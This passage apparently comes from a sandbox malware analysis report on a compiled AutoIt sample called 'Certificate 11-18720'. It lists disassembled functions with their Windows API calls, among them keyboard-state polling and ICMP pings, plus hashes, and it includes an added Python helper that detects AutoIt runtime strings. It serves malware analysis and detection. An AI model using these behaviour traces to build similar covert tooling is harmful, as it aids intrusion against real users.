• EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006077E4
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00607806
• SetActiveWindow.USER32 ref: 00607825
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00607833
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00607852
• Sleep.KERNEL32(000000FA), ref: 0060785D
• IsWindow.USER32 ref: 00607869
• EndDialog.USER32(00000000), ref: 0060787A
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
  • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
• CoInitialize.OLE32(00000000), ref: 0061034B
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006103DE
• SHGetDesktopFolder.SHELL32(?), ref: 006103F2
• CoCreateInstance.OLE32(0064DA8C,00000000,00000001,00673CF8,?), ref: 0061043E
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006104AD
• CoTaskMemFree.OLE32(?,?), ref: 00610505
• _memset.LIBCMT ref: 00610542
• SHBrowseForFolderW.SHELL32(?), ref: 0061057E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006105A1
• CoTaskMemFree.OLE32(00000000), ref: 006105A8
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006105DF
• CoUninitialize.OLE32(00000001,00000000), ref: 006105E1
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetKeyboardState.USER32(?), ref: 00602ED6
• SetKeyboardState.USER32(?), ref: 00602F41
• GetAsyncKeyState.USER32(000000A0), ref: 00602F61
• GetKeyState.USER32(000000A0), ref: 00602F78
• GetAsyncKeyState.USER32(000000A1), ref: 00602FA7
• GetKeyState.USER32(000000A1), ref: 00602FB8
• GetAsyncKeyState.USER32(00000011), ref: 00602FE4
• GetKeyState.USER32(00000011), ref: 00602FF2
• GetAsyncKeyState.USER32(00000012), ref: 0060301B
• GetKeyState.USER32(00000012), ref: 00603029
• GetAsyncKeyState.USER32(0000005B), ref: 00603052
• GetKeyState.USER32(0000005B), ref: 00603060
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 005FED1E
• GetWindowRect.USER32(00000000,?), ref: 005FED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005FED8E
• GetDlgItem.USER32(?,00000002), ref: 005FED99
• GetWindowRect.USER32(00000000,?), ref: 005FEDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005FEE01
• GetDlgItem.USER32(?,000003E9), ref: 005FEE0F
• GetWindowRect.USER32(00000000,?), ref: 005FEE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005FEE63
• GetDlgItem.USER32(?,000003EA), ref: 005FEE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005FEE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 005FEE9B
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 005DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005DB759,?,00000000,?,?,?,?,005DB72B,00000000,?), ref: 005DBA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005DB72B), ref: 005DB7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 005DB88D
• DestroyAcceleratorTable.USER32(00000000), ref: 0063D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D90A
• DeleteObject.GDI32(00000000), ref: 0063D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
APIs
  • Part of subcall function 005DB526: GetWindowLongW.USER32(?,000000EB), ref: 005DB537
• GetSysColor.USER32(0000000F), ref: 005DB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
APIs
• CharLowerBuffW.USER32(0065DC00,0065DC00,0065DC00), ref: 0060D7CE
• GetDriveTypeW.KERNEL32(?,00673A70,00000061), ref: 0060D898
• _wcscpy.LIBCMT ref: 0060D8C2
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: aa33687647e0b126a7a6644c2d60cca31d1773d9db62308b73ad7177ea3deb6f
                                                                                    • Instruction ID: 9a71eaaad27c2b812af8a2a7aec4617d45dbf8d8cadc7263ed02ac57a617cc6e
                                                                                    • Opcode Fuzzy Hash: aa33687647e0b126a7a6644c2d60cca31d1773d9db62308b73ad7177ea3deb6f
                                                                                    • Instruction Fuzzy Hash: F651A035144201AFC714EF54C886AAFBBA6FF84314F108A2EF59A573E2EB31DD05CA42
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 005C93AB
                                                                                    • __itow.LIBCMT ref: 005C93DF
                                                                                      • Part of subcall function 005E1557: _xtow@16.LIBCMT ref: 005E1578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_xtow@16
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 1502193981-2263619337
                                                                                    • Opcode ID: 4fd85c6e30aa8a03678994fa9a9ae8afd997ff5a18556a8bcb89078c47cd51a4
                                                                                    • Instruction ID: 43b5b78227e5dcc4972c2d4c6efdd90ba39908b88e25a89cbb91655e75ea4ec2
                                                                                    • Opcode Fuzzy Hash: 4fd85c6e30aa8a03678994fa9a9ae8afd997ff5a18556a8bcb89078c47cd51a4
                                                                                    • Instruction Fuzzy Hash: 5F41B5715042059FDB24DBA4D945FAABBE9FB84700F20486FE14AD7281EA71A941CB50
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0062A259
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0062A260
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0062A273
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0062A27B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0062A286
                                                                                    • DeleteDC.GDI32(00000000), ref: 0062A28F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0062A299
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0062A2AD
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0062A2B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: 3cd9c6a3ef83151ab2d16256b11349030e30b093b50d9eb7352fa9795c4d54db
                                                                                    • Instruction ID: 590a6ce9a2faaa3ac67dfdfba6f495ebde954d3c3e5827cdc9cfbec787eb4138
                                                                                    • Opcode Fuzzy Hash: 3cd9c6a3ef83151ab2d16256b11349030e30b093b50d9eb7352fa9795c4d54db
                                                                                    • Instruction Fuzzy Hash: 9731AD31501524FBDF219FA4EC09FEA3B6AFF0A360F150215FA19A61A0C772D811DBA5
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 2620052-3771769585
                                                                                    • Opcode ID: 2b210875a1abe770f1f7b9d7d74bacf0943d47a2859b4fea051f235b66f278d8
                                                                                    • Instruction ID: 34161861223b814443f3d8c0bd11c26a631b387b0be9b48b6a46b13083f0fe12
                                                                                    • Opcode Fuzzy Hash: 2b210875a1abe770f1f7b9d7d74bacf0943d47a2859b4fea051f235b66f278d8
                                                                                    • Instruction Fuzzy Hash: 7811E771904116AFCB28AB60EC4AEDA7BAEEF41710F011066F145961C1EFB09A958B50
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005E5047
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • __gmtime64_s.LIBCMT ref: 005E50E0
                                                                                    • __gmtime64_s.LIBCMT ref: 005E5116
                                                                                    • __gmtime64_s.LIBCMT ref: 005E5133
                                                                                    • __allrem.LIBCMT ref: 005E5189
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E51A5
                                                                                    • __allrem.LIBCMT ref: 005E51BC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E51DA
                                                                                    • __allrem.LIBCMT ref: 005E51F1
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E520F
                                                                                    • __invoke_watson.LIBCMT ref: 005E5280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction ID: 0fe84af7382476d9841a90465c340bd9c13171f2c30d2509f1ed96c6b2e45ed6
                                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction Fuzzy Hash: 9F7118B6A00F57ABD718DE7ACC45B6A7BA8BF40368F144229F690D6281F774DD408BD0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00604DF8
                                                                                    • GetMenuItemInfoW.USER32(00681708,000000FF,00000000,00000030), ref: 00604E59
                                                                                    • SetMenuItemInfoW.USER32(00681708,00000004,00000000,00000030), ref: 00604E8F
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00604EA1
                                                                                    • GetMenuItemCount.USER32(?), ref: 00604EE5
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00604F01
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00604F2B
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00604F70
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00604FB6
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604FCA
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 780a29ab9f1c527db072841d950afec9a3698420b94e00c38c70837302aaf48a
                                                                                    • Instruction ID: 2503ae8c23eede0a029c29526004b107cacbb06abb32c75fb072109d7a444a7c
                                                                                    • Opcode Fuzzy Hash: 780a29ab9f1c527db072841d950afec9a3698420b94e00c38c70837302aaf48a
                                                                                    • Instruction Fuzzy Hash: 806192B594024AAFDB28CFA4DC84AEF7BBAFB81304F140159F641972D1DB71AD45CB20
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00629C98
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00629C9B
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00629CBF
                                                                                    • _memset.LIBCMT ref: 00629CD0
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00629CE2
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00629D5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 995547fff0a8ed56b64f18c5afc72ffba87d027f3d66b2a55828bb90703f0998
                                                                                    • Instruction ID: 5d683f439fe4cc971d1c0d27147a45499dd39cac547f6c1d6513b0cfc575e1db
                                                                                    • Opcode Fuzzy Hash: 995547fff0a8ed56b64f18c5afc72ffba87d027f3d66b2a55828bb90703f0998
                                                                                    • Instruction Fuzzy Hash: 3E618C75A00618AFDB10DFA4DC81EEE77B9EF49704F100159FA44AB291D770AD42DF60
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 005F94FE
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 005F9549
                                                                                    • VariantInit.OLEAUT32(?), ref: 005F955B
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 005F957B
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 005F95BE
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 005F95D2
                                                                                    • VariantClear.OLEAUT32(?), ref: 005F95E7
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 005F95F4
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F95FD
                                                                                    • VariantClear.OLEAUT32(?), ref: 005F960F
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F961A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 5428c69626a8a776006b556a76d6e92f12d5b86bb2bff455bf62d7bd6b09eaaf
                                                                                    • Instruction ID: 175b3e44569e6877415d6b402a57cd6b41fd8f23e3e161f8a80a78f04104ca22
                                                                                    • Opcode Fuzzy Hash: 5428c69626a8a776006b556a76d6e92f12d5b86bb2bff455bf62d7bd6b09eaaf
                                                                                    • Instruction Fuzzy Hash: CD411C35E00219AFCB01EFA4D848AEEBFB9FF48354F008465E511E7261DB75EA45CBA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?g$|?g
                                                                                    • API String ID: 2862541840-3112630198
                                                                                    • Opcode ID: 567ab739826d79063efe155fc5295a72060a719ece1333fd5d37f43313f89188
                                                                                    • Instruction ID: daf2217a99acd6a5ee150dca271bd3ede8cacb319f6187213bb74e50a84f5dda
                                                                                    • Opcode Fuzzy Hash: 567ab739826d79063efe155fc5295a72060a719ece1333fd5d37f43313f89188
                                                                                    • Instruction Fuzzy Hash: 5691A271E00215ABDF24CFA5D884FEEBBBAEF85710F149159F505AB290DB709981CFA0
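The String IDs in the entries above (the drive-type list "all$cdrom$fixed$network$ramdisk$removable$unknown", the number format "%.15g", and the FOR..IN loop error messages) are strings of the AutoIt3 interpreter runtime, which is what the "Binary is likely a compiled AutoIt script file" signature in the report header rests on. The following triage helper is an added example, not part of the Joe Sandbox report and not code from the sample: it scans a file image for these markers in both ASCII and UTF-16LE (the API lists show a wide-character build: _wcscpy, __swprintf, GetMenuItemInfoW). The marker list, the hit threshold and the constructed test buffer are our own assumptions.

```python
# Added triage helper, not part of the Joe Sandbox report or of the sample.
# Scans a PE image for the AutoIt runtime strings that appear as "String ID"
# values in the function entries above. Treating them as AutoIt3 interpreter
# strings (DriveGetDrive type names, FOR..IN loop errors) is our assessment.
import re
from typing import Dict, List

# Markers lifted from the String ID fields above (assumed set, not exhaustive).
AUTOIT_RUNTIME_STRINGS: List[str] = [
    "Incorrect Object type in FOR..IN loop",
    "Null Object assignment in FOR..IN loop",
    "cdrom", "ramdisk", "removable",      # DriveGetDrive() type names
    "%.15g",                              # number-to-string format
]


def find_autoit_strings(data: bytes) -> Dict[str, List[int]]:
    """Return {marker: [offsets]} for every marker found as ASCII or UTF-16LE.

    The interpreter in this sample is a Unicode build (_wcscpy / __swprintf in
    the API lists), so the UTF-16LE encoding is the one expected to hit; the
    ASCII pass is kept for narrow builds and for strings copied by a packer.
    """
    hits: Dict[str, List[int]] = {}
    for marker in AUTOIT_RUNTIME_STRINGS:
        for needle in (marker.encode("ascii"), marker.encode("utf-16-le")):
            offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
            if offsets:
                hits.setdefault(marker, []).extend(offsets)
    return hits


def looks_like_compiled_autoit(data: bytes, min_distinct: int = 3) -> bool:
    """Weak heuristic: several distinct runtime strings present in one image.

    Short words such as "cdrom" occur in unrelated binaries, so a single hit
    is not evidence; the threshold (assumed value) asks for several markers.
    """
    return len(find_autoit_strings(data)) >= min_distinct


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a file image (not the real sample): 64 bytes
    of padding between three markers, two wide and one narrow."""
    pad = b"\x00" * 64
    return (pad
            + "Incorrect Object type in FOR..IN loop".encode("utf-16-le")
            + pad + "%.15g".encode("utf-16-le")
            + pad + b"ramdisk" + pad)


if __name__ == "__main__":
    import sys
    # Usage: python autoit_strings.py <file>   (defaults to the constructed buffer)
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    for marker, offsets in find_autoit_strings(image).items():
        print(f"{marker!r}: {[hex(o) for o in offsets]}")
    print("compiled AutoIt likely:", looks_like_compiled_autoit(image))
```

Run it against the dumped image 00000000.00000002.1703473779.00000000005C1000 rather than the on-disk sample when the sample is packed: the markers belong to the interpreter that is unpacked in memory, and a positive hit there is what corroborates the signature.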
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CoInitialize.OLE32 ref: 0061ADF6
                                                                                    • CoUninitialize.OLE32 ref: 0061AE01
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0064D8FC,?), ref: 0061AE61
                                                                                    • IIDFromString.OLE32(?,?), ref: 0061AED4
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061AF6E
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061AFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 538fe6a3d949fbf82570a50dc774bf1add721c02cc84a90f1c93a08c66a633df
                                                                                    • Instruction ID: 1924748830f1f67edef51f8255da5a539db671b18b3f0e0fdd129899091c2723
                                                                                    • Opcode Fuzzy Hash: 538fe6a3d949fbf82570a50dc774bf1add721c02cc84a90f1c93a08c66a633df
                                                                                    • Instruction Fuzzy Hash: 6461AF706093119FD711DFA4C848BAABBEABF89714F08450DF9859B292C770ED85CB93
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00618168
                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 006181AD
                                                                                    • gethostbyname.WSOCK32(?), ref: 006181B9
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 006181C7
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00618237
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0061824D
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006182C2
                                                                                    • WSACleanup.WSOCK32 ref: 006182C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 320c598882eebeac5e23cdb50fee6bc2a7d99fcfbc37086031e4fd6e91caa5da
                                                                                    • Instruction ID: c4754d6b3c0a0fc7e0b5d390ca10c5b36a9e353ac3a4b09b42b3ac3aed01b196
                                                                                    • Opcode Fuzzy Hash: 320c598882eebeac5e23cdb50fee6bc2a7d99fcfbc37086031e4fd6e91caa5da
                                                                                    • Instruction Fuzzy Hash: 6F51A035600701AFD7219F64CC49BAABBE6BF49310F08892AF955DB3A0DB30ED41CB81
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060E396
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0060E40C
                                                                                    • GetLastError.KERNEL32 ref: 0060E416
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0060E483
                                                                                    Strings
                                                                                    Memory Dump Source
